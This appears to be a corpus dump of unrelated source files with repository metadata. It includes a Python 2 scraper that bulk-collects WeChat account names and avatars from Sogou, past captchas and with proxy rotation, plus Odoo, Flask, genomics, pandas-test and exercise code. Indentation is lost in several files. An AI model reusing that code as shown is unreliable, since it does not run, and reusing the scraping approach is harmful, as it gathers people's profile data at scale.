# https_ip = http_ip.split(":")[0] + data.split(',')[-1]
# proxies = {
# "http":http_ip,
# "https":https_ip,
# }
# try:
# print "测试结果:%s"%requests.get("http://www.baidu.com",proxies=proxies)
# except:
# print "失败proxies:%s"%proxies
# else:
# proxies_queue.append(proxies)
# print "now proxies_queue:%s"%proxies_queue
# def get_proxies():
# print "now proxies_queue:%s"%proxies_queue
# if len(proxies_queue) < 20:
# for i in range(1,6):
# print "wait for put proxy... %s"%i
# time.sleep(1)
# put_proxy_queue()
# res = random.choice(proxies_queue)
# try:
# requests.get("http://www.baidu.com",proxies=res)
# except:
# proxies_queue.remove(res)
# return get_proxies()
# else:
# return res
def if_list_code(weixins,detail_srcs):
if len(weixins) == 1:
code = raw_input("请输入验证码:")
code_label = driver.find_element_by_name("c")
code_label.send_keys(" ") # 防止发送不成功
code_label.clear()
code_label.send_keys(code)
submit_label = driver.find_element_by_id("submit")
submit_label.click()
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
weixins = html.xpath("//label/text()")
detail_srcs = html.xpath("//li//div/p[@class='tit']/a/@href")
print "weixins:%s"%weixins
if len(weixins) == 1:
return if_list_code(weixins,detail_srcs)
return weixins,detail_srcs
def search_list(word):
print "search_list:%s"%word
for i in range(1,11):
url = BASIC_URL%(word,i)
# resp = requests.get(url,headers=HEADERS)
driver.get(url)
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
# print resp.content.decode()
# print "============="
# print url
# print "============="
# print resp.status_code
weixins = html.xpath("//label/text()")
detail_srcs = html.xpath("//li//div/p[@class='tit']/a/@href")
weixins,detail_srcs = if_list_code(weixins,detail_srcs)
if not weixins:
break
deal_detail(weixins,detail_srcs)
def get_words():
words = set()
url = "https://hanyu.baidu.com/s?wd=%E7%99%BE%E5%AE%B6%E5%A7%93&from=poem"
resp = requests.get(url,headers=HEADERS)
resp.encoding = "utf-8"
html = resp.text
for w in html:
words.add(w)
return words
def main():
print "main start..."
words = get_words()
for w in words:
sql = "select word from got_word where word = %s"
cursor.execute(sql,(w,))
if cursor.fetchone():
print "%s 已搜过,跳过..."%w
continue
print "开始搜索:%s"%w
search_list(w)
sql = "insert into got_word(word) values(%s)"
cursor.execute(sql,(w,))
def if_detail_code(heads,names):
    # captcha popped up on the detail page
if not names:
code = raw_input("请输入验证码:")
code_label = driver.find_element_by_id("input")
code_label.send_keys(" ") # 防止发送不成功
code_label.clear()
code_label.send_keys(code)
submit_label = driver.find_element_by_id("bt")
submit_label.click()
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
heads = html.xpath("//div//span/img/@src")
names = html.xpath("//strong/text()")
if not names:
return if_detail_code(heads,names)
return heads,names
def deal_detail(weixins,detail_srcs):
print "deal_detail start..."
for i,weixin in enumerate(weixins):
sql = "select weixin from robot where weixin = %s"
cursor.execute(sql,(weixin,))
res = cursor.fetchone()
if res:
continue
src = detail_srcs[i]
        # name and avatar from the detail page
# resp = requests.get(src,headers=HEADERS)
# html = etree.HTML(resp.content)
driver.get(src)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
heads = html.xpath("//div//span/img/@src")
names = html.xpath("//strong/text()")
heads,names = if_detail_code(heads,names)
head = heads[0].replace("http","https")
name = names[0].strip()
sql = "insert into robot(weixin,name,head) values(%s,%s,%s)"
cursor.execute(sql,(weixin,name,head))
print weixin,name,head,"ok!"
time.sleep(1)
# def test2():
# url = "https://weixin.sogou.com/weixin?query=%E6%9D%8E&_sug_type_=&s_from=input&_sug_=n&type=1&page=222&ie=utf8"
# resp = requests.get(url,headers=HEADERS)
# html = etree.HTML(resp.content)
# weixins = html.xpath("//label/text()")
# print "==========================="
# print weixins
# print "==========================="
if __name__ == "__main__":
main()
cursor.close()
conn.close()
driver.close()
|
[
"1983654762@qq.com"
] |
1983654762@qq.com
|
8c8b678d13701ba585b3238bd029821548cc4783
|
f7550c4964dc8f3c59dbcebe39e947bd6a264dba
|
/1.Recorsions - 1/String into Int.py
|
49eb468cd5f79f87fb2aa7dff14c15aa4c47eb1d
|
[] |
no_license
|
Jashwanth-k/Data-Structures-and-Algorithms
|
db5e2e30932e0a35db578c19ae6cff9f147b7c3d
|
1ebf9986999a474cb094f3ab04616a46f2887043
|
refs/heads/main
| 2023-08-25T02:57:17.394322
| 2021-10-11T15:27:56
| 2021-10-11T15:27:56
| 402,448,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 229
|
py
|
def str_to_int(s):
    l = len(s)
    if l == 0:
        # guard: an empty string has no digits, so return 0 instead of recursing forever
        return 0
    if l == 1:
        return ord(s[0]) - ord('0')
a = str_to_int(s[1:])
b = ord(s[0]) - ord('0')
output = b*(10**(l-1)) + a
return output
s = ''
print(str_to_int(s))
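
# Additional illustrative check (not in the original exercise): a non-empty input.
assert str_to_int('1234') == 1234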
|
[
"noreply@github.com"
] |
Jashwanth-k.noreply@github.com
|
2aa7e05f460ae0b7d0f6ea6a66312db082a1ce07
|
da052c0bbf811dc4c29a83d1b1bffffd41becaab
|
/core/serial_number_expired_date/models/stock_picking.py
|
6b51aa2baf397a198e54c46a84b406b3800e23da
|
[] |
no_license
|
Muhammad-SF/Test
|
ef76a45ad28ac8054a4844f5b3826040a222fb6e
|
46e15330b5d642053da61754247f3fbf9d02717e
|
refs/heads/main
| 2023-03-13T10:03:50.146152
| 2021-03-07T20:28:36
| 2021-03-07T20:28:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,983
|
py
|
# -*- coding: utf-8 -*-
import logging
from odoo import models, fields, api , _
import datetime
# from dateutil.relativedelta import relativedelta
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT, float_compare, float_round
class PackOperation(models.Model):
_inherit = 'stock.pack.operation.lot'
expired_date = fields.Datetime(string='Expiry Date', store=True)
class Picking(models.Model):
_inherit = "stock.picking"
def _create_lots_for_picking(self):
Lot = self.env['stock.production.lot']
for pack_op_lot in self.mapped('pack_operation_ids').mapped('pack_lot_ids'):
if not pack_op_lot.lot_id:
lot = Lot.create({'name': pack_op_lot.lot_name, 'product_id': pack_op_lot.operation_id.product_id.id, 'use_date':pack_op_lot.expired_date,'expired_date':pack_op_lot.expired_date})
pack_op_lot.write({'lot_id': lot.id})
# TDE FIXME: this should not be done here
self.mapped('pack_operation_ids').mapped('pack_lot_ids').filtered(lambda op_lot: op_lot.qty == 0.0).unlink()
create_lots_for_picking = _create_lots_for_picking
class Quant(models.Model):
_inherit = "stock.quant"
expired_date = fields.Date(related='lot_id.use_date',string='Expiry Date', store=True)
class StockProductionLot(models.Model):
_inherit = 'stock.production.lot'
expired_date = fields.Datetime(string='Expiry Date', store=True)
# Assign dates according to products data
@api.model
def create(self, vals):
dates = self._get_dates(vals.get('product_id'))
product_id = vals.get('product_id')
exp_date = vals.get('expired_date')
if exp_date:
expired_date = datetime.datetime.strptime(exp_date, DEFAULT_SERVER_DATETIME_FORMAT)
else:
expired_date = datetime.datetime.now()
product = self.env['product.product'].browse(product_id)
if product:
for d in dates.keys():
if d in ['use_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.use_time)
vals['use_date'] = fields.Datetime.to_string(date)
if d in ['life_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.life_time)
vals['life_date'] = fields.Datetime.to_string(date)
if d in ['alert_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.alert_time)
vals['alert_date'] = fields.Datetime.to_string(date)
if d in ['removal_date']:
date = expired_date
vals['removal_date'] = fields.Datetime.to_string(date)
return super(StockProductionLot, self).create(vals)
|
[
"jbalu2801@gmail.com"
] |
jbalu2801@gmail.com
|
20dd8bac432917f44ec65e02ad42a37c002d8dc7
|
dd6c759081c1490c624de00f9519216613de5293
|
/src/ui/__init__.py
|
02186177946aec017837c2690ac545a6690800ea
|
[
"MIT"
] |
permissive
|
forcemain/SwarmOps
|
76151fd31dff5288f3bc66a24c03547c6d9bb142
|
07675b362c83ce74bae13cb1c9ee627dc4ee25ed
|
refs/heads/master
| 2021-06-18T12:41:11.960706
| 2017-05-10T01:04:44
| 2017-05-10T01:04:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,826
|
py
|
# -*- coding:utf-8 -*-
#
# SwarmOps views for ui
#
from flask import Blueprint, render_template, url_for, redirect, g, abort
from utils.public import logger, login_required
ui_blueprint = Blueprint("ui", __name__, template_folder="templates", static_folder='static')
''' swarm route'''
@ui_blueprint.route("/")
@ui_blueprint.route("/swarm/")
@login_required
def index():
return render_template("swarm/swarm.html")
@ui_blueprint.route("/swarm/add/")
@login_required
def swarm_add():
return render_template("swarm/add.html")
@ui_blueprint.route("/swarm/init/")
@login_required
def swarm_init():
return render_template("swarm/init.html")
'''service route'''
@ui_blueprint.route("/service/")
@login_required
def service():
return render_template("service/service.html")
@ui_blueprint.route("/service/delete/")
@login_required
def service_delete():
return render_template("service/delete.html")
@ui_blueprint.route("/service/update/")
@login_required
def service_update():
return render_template("service/update.html")
@ui_blueprint.route("/service/create/")
@login_required
def service_create():
return render_template("service/create.html")
@ui_blueprint.route("/service/detail/")
@login_required
def service_detail():
return render_template("service/detail.html")
@ui_blueprint.route("/service/nginx/")
@login_required
def service_nginx():
return render_template("service/nginx.html")
'''node route'''
@ui_blueprint.route("/node/")
@login_required
def node():
return render_template("node/node.html")
@ui_blueprint.route("/node/add/")
@login_required
def node_add():
return render_template("node/add.html")
@ui_blueprint.route("/node/update/")
@login_required
def node_update():
return render_template("node/update.html")
@ui_blueprint.route("/node/delete/")
@login_required
def node_delete():
return render_template("node/delete.html")
'''misc route'''
@ui_blueprint.route("/misc/")
@login_required
def misc():
return render_template("misc.html")
@ui_blueprint.route("/storage/")
@login_required
def storage():
return render_template("misc/storage.html")
'''network route'''
@ui_blueprint.route("/network/")
@login_required
def network():
return render_template("network/network.html")
'''registry route'''
@ui_blueprint.route("/registry/")
@login_required
def registry():
return render_template("registry/registry.html")
@ui_blueprint.route("/registry/<namespace>/<repository_name>/")
@login_required
def registryImageName(namespace, repository_name):
return render_template("registry/imageName.html", imageName="{}/{}".format(namespace, repository_name).replace("_/", ""))
@ui_blueprint.route("/registry/<imageId>/")
@login_required
def registryImageId(imageId):
return render_template("registry/imageId.html", imageId=imageId)
|
[
"staugur@vip.qq.com"
] |
staugur@vip.qq.com
|
b783d5bf51d4bb8dd0b44dab30f43382f53dfeb2
|
bb9ab2b88c990377e58fd2b719a60f2e4a4689ce
|
/est-sfs/01_vcf_to_estsfs.py
|
8304ae2a0ee0641c79e0ee2e8fe764171fc6c5b3
|
[] |
no_license
|
silvewheat/biocal-cli
|
7ded0e05c134c932a7dd45130c546cd607b443b9
|
134a0bf4f0d318de50a92a1e72d18c13580e64e2
|
refs/heads/master
| 2022-12-11T21:04:25.240272
| 2022-11-28T02:40:02
| 2022-11-28T02:40:02
| 147,090,111
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,551
|
py
|
# -*- coding: utf-8 -*-
"""
Created on 2022 10-14
@author: Yudongcai
@Email: yudong_cai@163.com
"""
import re
import typer
import numpy as np
from cyvcf2 import VCF
from collections import Counter, defaultdict
def convert_gts(gt_bases):
gt_split = re.compile(r'[/|]')
bases = []
for base in gt_bases:
bases.extend(gt_split.split(base))
return bases
def main(vcffile: str = typer.Argument(..., help="input vcf file"),
focalsamples: str = typer.Argument(..., help="sample list for focal samples"),
outgroup1: str = typer.Argument(..., help="sample list for outgroup1"),
outgroup2: str = typer.Argument(..., help="sample list for outgroup2"),
outgroup3: str = typer.Argument(..., help="sample list for outgroup3"),
outprefix: str = typer.Argument(..., help="output prefix")):
focal_samples = [x.strip() for x in open(focalsamples)]
outgroup1_samples = [x.strip() for x in open(outgroup1)]
outgroup2_samples = [x.strip() for x in open(outgroup2)]
outgroup3_samples = [x.strip() for x in open(outgroup3)]
samples = focal_samples + outgroup1_samples + outgroup2_samples + outgroup3_samples
print(f'focal samples: {len(focal_samples)}\noutgroup1: {len(outgroup1_samples)}\noutgroup2: {len(outgroup2_samples)}\noutgroup3: {len(outgroup3_samples)}')
with open(f'{outprefix}_siteInfo.tsv', 'w') as f1, open(f'{outprefix}_datafile', 'w') as f2:
base2index = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
f1.write('CHROM\tPOS\tREF\tALT\tmajorAllele\tminorAllele\n')
vcf = VCF(vcffile, gts012=True, samples=samples)
focal_selection = [True if x in focal_samples else False for x in vcf.samples]
outgroup1_selection = [True if x in outgroup1_samples else False for x in vcf.samples]
outgroup2_selection = [True if x in outgroup2_samples else False for x in vcf.samples]
outgroup3_selection = [True if x in outgroup3_samples else False for x in vcf.samples]
outgroup_selections = (outgroup1_selection, outgroup2_selection, outgroup3_selection)
for variant in vcf:
alleles = [variant.REF] + variant.ALT
f1.write(f'{variant.CHROM}\t{variant.POS}\t{variant.REF}\t' + ','.join(variant.ALT) + '\t')
counter_gts_focal = Counter(convert_gts(variant.gt_bases[focal_selection]))
major_allele = counter_gts_focal.most_common()[0][0]
try:
minor_allele = counter_gts_focal.most_common()[1][0]
except IndexError:
minor_allele = list(set(alleles) - set(major_allele))[0]
f1.write(f'{major_allele}\t{minor_allele}\n')
f2.write(f"{counter_gts_focal.get('A', 0)},{counter_gts_focal.get('C', 0)},{counter_gts_focal.get('G', 0)},{counter_gts_focal.get('T', 0)}")
for selection in outgroup_selections:
counts = ['0', '0', '0', '0'] # A C G T
counter_gts = Counter(convert_gts(variant.gt_bases[selection])).most_common()
first_base, first_count = counter_gts[0]
try:
second_base, second_count = counter_gts[1]
except IndexError:
second_count = 0
                # when the two alleles have equal counts, treat the site as missing
if (first_count > second_count) and (first_base != '.'):
counts[base2index[first_base]] = '1'
f2.write('\t'+','.join(counts))
f2.write('\n')
if __name__ == '__main__':
typer.run(main)
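
# Illustrative invocation (the input file and list names below are hypothetical):
#   python 01_vcf_to_estsfs.py input.vcf.gz focal.list og1.list og2.list og3.list out_prefix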
|
[
"silverwheat@163.com"
] |
silverwheat@163.com
|
80c66729e6cbcb7721e17efef2dc1381872cf87d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_minefields.py
|
9a6f4d39f05827d2da9dbb885032211575fb3e49
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
# class header
class _MINEFIELDS():
    def __init__(self):
        self.name = "MINEFIELDS"
        self.definitions = 'minefield'
        self.parents = []
        self.childen = []
        self.properties = []
        self.jsondata = {}
        self.basic = ['minefield']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
df42fb81ab121a9776879d10e34a82753afc05d5
|
8cf5d738aa1bf604c1215bff0e57aef0218a5194
|
/0x1F-pascal_triangle/0-pascal_triangle.py
|
570ddb16f491d2e0ae1e2b7f26f319cb0f7f6d38
|
[] |
no_license
|
PilarPinto/holbertonschool-interview
|
3493bdb41fbc437e4dcf58db99cebcc350c2029f
|
b58bbce825426e9a15fee67dec65768f0ae0d724
|
refs/heads/master
| 2023-07-13T09:28:56.071905
| 2021-08-27T03:29:44
| 2021-08-27T03:29:44
| 281,306,960
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 472
|
py
|
#!/usr/bin/python3
'''
Module defining a function that builds the integer rows of Pascal's triangle
'''
def pascal_triangle(n):
    '''Return the rows of Pascal's triangle up to row n'''
if n <= 0:
return []
pas_r = [[1]]
if n > 1:
pas_r.append([1, 1])
for ind in range(3, n + 1):
pas_r.append([1] + list(map(
lambda i: pas_r[ind - 2][i] + pas_r[ind - 2][i + 1], range(
len(pas_r[ind - 2]) - 1))) + [1])
return pas_r
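
# Quick illustrative check (not part of the original file).
if __name__ == "__main__":
    print(pascal_triangle(5))
    # -> [[1], [1, 1], [1, 2, 1], [1, 3, 3, 1], [1, 4, 6, 4, 1]]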
|
[
"piapintoch@unal.edu.co"
] |
piapintoch@unal.edu.co
|
f10521bec9c35ed9de1f626cde80d9f4c3eccfd2
|
3b5c46ce2daa75e1e157838d0f6cfd92469471a0
|
/plastering/inferencers/scrabble/ground_truth_gen.py
|
06262e23e98f035aa786f957245812f56a341b1c
|
[
"MIT"
] |
permissive
|
plastering/plastering
|
1b4e9c04fce4b26b22fe5ade05af9baf644b4eaa
|
26ffeecb38844ebb122fde5d9bd2276a7b4150a0
|
refs/heads/master
| 2023-04-04T07:50:59.087529
| 2021-05-17T23:31:40
| 2021-05-17T23:31:40
| 149,086,461
| 37
| 17
|
MIT
| 2023-03-24T23:19:24
| 2018-09-17T07:32:17
|
Python
|
UTF-8
|
Python
| false
| false
| 3,069
|
py
|
import pdb
import json
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(choices=['ap_m','ebu3b', 'bml'], dest='building')
args = parser.parse_args()
import pandas as pd
from brick_parser import equipTagsetList as equip_tagsets, \
locationTagsetList as location_tagsets,\
pointSubclassDict as point_subclass_dict,\
equipSubclassDict as equip_subclass_dict,\
locationSubclassDict as location_subclass_dict
subclass_dict = dict()
subclass_dict.update(point_subclass_dict)
subclass_dict.update(equip_subclass_dict)
subclass_dict.update(location_subclass_dict)
subclass_dict['networkadapter'] = list()
subclass_dict['none'] = list()
subclass_dict['unknown'] = list()
building = args.building
sensor_df = pd.read_csv('metadata/{0}_sensor_types_location.csv'\
.format(building)).set_index('Unique Identifier')
with open('metadata/{0}_label_dict_justseparate.json'\
.format(building), 'r') as fp:
label_dict = json.load(fp)
with open('metadata/{0}_sentence_dict_justseparate.json'\
.format(building), 'r') as fp:
sentence_dict = json.load(fp)
nonpoint_tagsets = equip_tagsets + location_tagsets + ['networkadapter']
def find_nonpoint_tagsets(tagset):
if tagset.split('-')[0] in nonpoint_tagsets:
return tagset
else:
return ''
truth_dict = dict()
for srcid, label_list in label_dict.items():
sentence = sentence_dict[srcid]
phrase_list = list()
truth_list = list()
sentence_meanings = [(token,label)
for token, label
in zip(sentence, label_list)
if label not in ['none', 'unknown']]
right_identifier_buffer = ''
for (token, label) in sentence_meanings:
if label=='leftidentifier':
# phrase_list[-1] += ('-' + token)
continue
elif label=='rightidentifier':
# right_identifier_buffer += token
continue
phrase_list.append(label)
if right_identifier_buffer:
phrase_list[-1] += ('-' + right_identifier_buffer)
truth_list = [phrase
for phrase
in phrase_list
if find_nonpoint_tagsets(phrase)]
removing_tagsets = list()
for tagset in truth_list:
subclasses = subclass_dict[tagset.split('-')[0]]
if sum([True if tagset in subclasses else False
for tagset in truth_list]) > 1:
removing_tagsets.append(tagset)
for tagset in removing_tagsets:
truth_list = list(filter(tagset.__ne__, truth_list))
try:
truth_list.append(sensor_df['Schema Label'][srcid].replace(' ', '_'))
except:
print(srcid, 'failed')
truth_dict[srcid] = list(set(truth_list))
# TODO: add all labels to a dict (except point type info)
with open('metadata/{0}_ground_truth.json'.format(building), 'w') as fp:
json.dump(truth_dict, fp, indent=2)
|
[
"bk7749@gmail.com"
] |
bk7749@gmail.com
|
12e23d45d86604712c62c27d9d5d24bbd21d6e2f
|
c325866c577343752f0d4394c3d96e599674df0e
|
/models/nosis_configuracion.py
|
b133bf8a84cf2a4d4f2ff5dd7f1a714f0cc0ee4e
|
[] |
no_license
|
levislibra/financiera_nosis
|
ff11f4f8417917d48220d40c1524f91d5f1a4d24
|
3227e9258e2f8519880081232070734e929af3f8
|
refs/heads/master
| 2023-01-05T20:23:01.509995
| 2022-12-22T18:33:05
| 2022-12-22T18:33:05
| 236,527,122
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,340
|
py
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
from datetime import datetime, timedelta
from dateutil import relativedelta
from openerp.exceptions import UserError, ValidationError
import time
import requests
ENDPOINT_NOSIS = 'https://ws01.nosis.com/rest/variables'
class FinancieraNosisConfiguracion(models.Model):
_name = 'financiera.nosis.configuracion'
name = fields.Char('Nombre')
usuario = fields.Char('Usuario')
token = fields.Char('Token')
id_informe = fields.Integer('Id proximo informe', default=1)
id_cuestionario = fields.Integer('Id proximo cuestionario', default=1)
ejecutar_cda_al_solicitar_informe = fields.Boolean('Ejecutar CDAs al solicitar informe')
solicitar_informe_enviar_a_revision = fields.Boolean('Solicitar informe al enviar a revision')
vr = fields.Integer('Grupo de variables')
nro_grupo_vid = fields.Integer('Grupo VID')
nro_grupo_vid2 = fields.Integer('Grupo VID 2do intento')
nosis_variable_1 = fields.Char('Variable 1')
nosis_variable_2 = fields.Char('Variable 2')
nosis_variable_3 = fields.Char('Variable 3')
nosis_variable_4 = fields.Char('Variable 4')
nosis_variable_5 = fields.Char('Variable 5')
asignar_nombre_cliente = fields.Boolean('Asignar Nombre al cliente')
asignar_nombre_cliente_variable = fields.Char('Variable para el Nombre', default='VI_RazonSocial')
asignar_direccion_cliente = fields.Boolean('Asignar Direccion al cliente')
asignar_calle_cliente_variable = fields.Char('Variable para la calle', default='VI_DomAF_Calle')
asignar_nro_cliente_variable = fields.Char('Variable para el Nro', default='VI_DomAF_Nro')
asignar_piso_cliente_variable = fields.Char('Variable para el Piso', default='VI_DomAF_Piso')
asignar_departamento_cliente_variable = fields.Char('Variable para el Departamento', default='VI_DomAF_Dto')
asignar_ciudad_cliente = fields.Boolean('Asignar Ciudad a direccion')
asignar_ciudad_cliente_variable = fields.Char('Variable para la ciudad', default='VI_DomAF_Loc')
asignar_cp_cliente = fields.Boolean('Asignar CP a direccion')
asignar_cp_cliente_variable = fields.Char('Variable para el CP', default='VI_DomAF_CP')
asignar_provincia_cliente = fields.Boolean('Asignar Provincia a direccion')
asignar_provincia_cliente_variable = fields.Char('Variable para la Provincia', default='VI_DomAF_Prov')
asignar_identificacion_cliente = fields.Boolean('Asignar identificacion al cliente')
asignar_identificacion_cliente_variable = fields.Char('Variable para la identificacion', default='VI_Identificacion')
asignar_genero_cliente = fields.Boolean('Asignar genero al cliente')
asignar_genero_cliente_variable = fields.Char('Variable para genero', default='VI_Sexo')
company_id = fields.Many2one('res.company', 'Empresa', required=False, default=lambda self: self.env['res.company']._company_default_get('financiera.nosis.configuracion'))
@api.one
def test_conexion(self):
params = {
'usuario': self.usuario,
'token': self.token,
}
response = requests.get(ENDPOINT_NOSIS, params)
if response.status_code == 400:
raise UserError("La cuenta esta conectada.")
else:
raise UserError("Error de conexion.")
class ExtendsResCompany(models.Model):
_name = 'res.company'
_inherit = 'res.company'
nosis_configuracion_id = fields.Many2one('financiera.nosis.configuracion', 'Configuracion Nosis')
|
[
"levislibra@hotmail.com"
] |
levislibra@hotmail.com
|
563eba447c671fd512d395f592dacda7801a7acf
|
1b9075ffea7d4b846d42981b41be44238c371202
|
/2008/devel/applications/office/abiword/actions.py
|
e75fb6419d91ba18ae0f32bc78933b9d14e7ebfc
|
[] |
no_license
|
pars-linux/contrib
|
bf630d4be77f4e484b8c6c8b0698a5b34b3371f4
|
908210110796ef9461a1f9b080b6171fa022e56a
|
refs/heads/master
| 2020-05-26T20:35:58.697670
| 2011-07-11T11:16:38
| 2011-07-11T11:16:38
| 82,484,996
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 848
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2
# See the file http://www.gnu.org/copyleft/gpl.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure("--with-x \
--with-ImageMagick \
--with-libxml2 \
--with-zlib \
--with-libpng \
--with-popt \
--enable-printing \
--enable-gnomeui")
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("docs/Abi*", "docs/NonLatin1UnixLocales.abw")
|
[
"MeW@a748b760-f2fe-475f-8849-a8a11d7a3cd2"
] |
MeW@a748b760-f2fe-475f-8849-a8a11d7a3cd2
|
c805b342485e670743486773449b5dfe5ee5d797
|
5c269629ca7d5ffb3a6035d056ae88f90fd8153a
|
/pandas/tests/series/test_dtypes.py
|
6864eac603ded8a41a02dd6bd6d298bf10d41607
|
[
"BSD-3-Clause",
"LicenseRef-scancode-other-permissive",
"BSD-2-Clause"
] |
permissive
|
bdrosen96/pandas
|
416e5cb1941b21cee38a30346056a257b7d2b0ce
|
506520bd35331aa82db50686c07d96594cac0c10
|
refs/heads/master
| 2021-01-15T09:20:22.851970
| 2016-07-19T02:06:18
| 2016-07-19T02:06:23
| 63,601,381
| 0
| 0
|
NOASSERTION
| 2019-11-21T13:08:56
| 2016-07-18T12:31:49
|
Python
|
UTF-8
|
Python
| false
| false
| 5,127
|
py
|
# coding=utf-8
# pylint: disable-msg=E1101,W0612
import sys
from datetime import datetime
import string
from numpy import nan
import numpy as np
from pandas import Series
from pandas.tseries.index import Timestamp
from pandas.tseries.tdi import Timedelta
from pandas.compat import lrange, range, u
from pandas import compat
from pandas.util.testing import assert_series_equal
import pandas.util.testing as tm
from .common import TestData
class TestSeriesDtypes(TestData, tm.TestCase):
_multiprocess_can_split_ = True
def test_astype(self):
s = Series(np.random.randn(5), name='foo')
for dtype in ['float32', 'float64', 'int64', 'int32']:
astyped = s.astype(dtype)
self.assertEqual(astyped.dtype, dtype)
self.assertEqual(astyped.name, s.name)
def test_dtype(self):
self.assertEqual(self.ts.dtype, np.dtype('float64'))
self.assertEqual(self.ts.dtypes, np.dtype('float64'))
self.assertEqual(self.ts.ftype, 'float64:dense')
self.assertEqual(self.ts.ftypes, 'float64:dense')
assert_series_equal(self.ts.get_dtype_counts(), Series(1, ['float64']))
assert_series_equal(self.ts.get_ftype_counts(), Series(
1, ['float64:dense']))
def test_astype_cast_nan_int(self):
df = Series([1.0, 2.0, 3.0, np.nan])
self.assertRaises(ValueError, df.astype, np.int64)
def test_astype_cast_object_int(self):
arr = Series(["car", "house", "tree", "1"])
self.assertRaises(ValueError, arr.astype, int)
self.assertRaises(ValueError, arr.astype, np.int64)
self.assertRaises(ValueError, arr.astype, np.int8)
arr = Series(['1', '2', '3', '4'], dtype=object)
result = arr.astype(int)
self.assert_series_equal(result, Series(np.arange(1, 5)))
def test_astype_datetimes(self):
import pandas.tslib as tslib
s = Series(tslib.iNaT, dtype='M8[ns]', index=lrange(5))
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
s = Series([datetime(2001, 1, 2, 0, 0)])
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
s = Series([datetime(2001, 1, 2, 0, 0) for i in range(3)])
s[1] = np.nan
self.assertEqual(s.dtype, 'M8[ns]')
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
def test_astype_str(self):
# GH4405
digits = string.digits
s1 = Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)])
s2 = Series([digits * 10, tm.rands(63), tm.rands(64), nan, 1.0])
types = (compat.text_type, np.str_)
for typ in types:
for s in (s1, s2):
res = s.astype(typ)
expec = s.map(compat.text_type)
assert_series_equal(res, expec)
# GH9757
# Test str and unicode on python 2.x and just str on python 3.x
for tt in set([str, compat.text_type]):
ts = Series([Timestamp('2010-01-04 00:00:00')])
s = ts.astype(tt)
expected = Series([tt('2010-01-04')])
assert_series_equal(s, expected)
ts = Series([Timestamp('2010-01-04 00:00:00', tz='US/Eastern')])
s = ts.astype(tt)
expected = Series([tt('2010-01-04 00:00:00-05:00')])
assert_series_equal(s, expected)
td = Series([Timedelta(1, unit='d')])
s = td.astype(tt)
expected = Series([tt('1 days 00:00:00.000000000')])
assert_series_equal(s, expected)
def test_astype_unicode(self):
# GH7758
# a bit of magic is required to set default encoding encoding to utf-8
digits = string.digits
test_series = [
Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)]),
Series([u('データーサイエンス、お前はもう死んでいる')]),
]
former_encoding = None
if not compat.PY3:
# in python we can force the default encoding for this test
former_encoding = sys.getdefaultencoding()
reload(sys) # noqa
sys.setdefaultencoding("utf-8")
if sys.getdefaultencoding() == "utf-8":
test_series.append(Series([u('野菜食べないとやばい')
.encode("utf-8")]))
for s in test_series:
res = s.astype("unicode")
expec = s.map(compat.text_type)
assert_series_equal(res, expec)
# restore the former encoding
if former_encoding is not None and former_encoding != "utf-8":
reload(sys) # noqa
sys.setdefaultencoding(former_encoding)
    def test_complex(self):
# GH4819
# complex access for ndarray compat
a = np.arange(5, dtype=np.float64)
b = Series(a + 4j * a)
tm.assert_numpy_array_equal(a, b.real)
tm.assert_numpy_array_equal(4 * a, b.imag)
b.real = np.arange(5) + 5
tm.assert_numpy_array_equal(a + 5, b.real)
tm.assert_numpy_array_equal(4 * a, b.imag)
|
[
"jeff@reback.net"
] |
jeff@reback.net
|
f982f49bded21d3ec480ed23147785cb1e622b6f
|
e4007870b4d75ba23c2f12ac6646f272cf17865c
|
/Types/Detection_3D.py
|
33c52d337085600db6cc52e4e9c38d9631902223
|
[
"MIT"
] |
permissive
|
knut0815/PythonUtility
|
385ce332ff34501be7ad21ac7948eb609770e72a
|
0062e1e60dc151776b963d13bc4c1763eb90d333
|
refs/heads/master
| 2023-01-10T09:58:14.619531
| 2020-11-10T12:22:47
| 2020-11-10T12:22:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,453
|
py
|
import numpy as np
from Utility.Classes.Frozen_Class import FrozenClass
class Detection3D(FrozenClass):
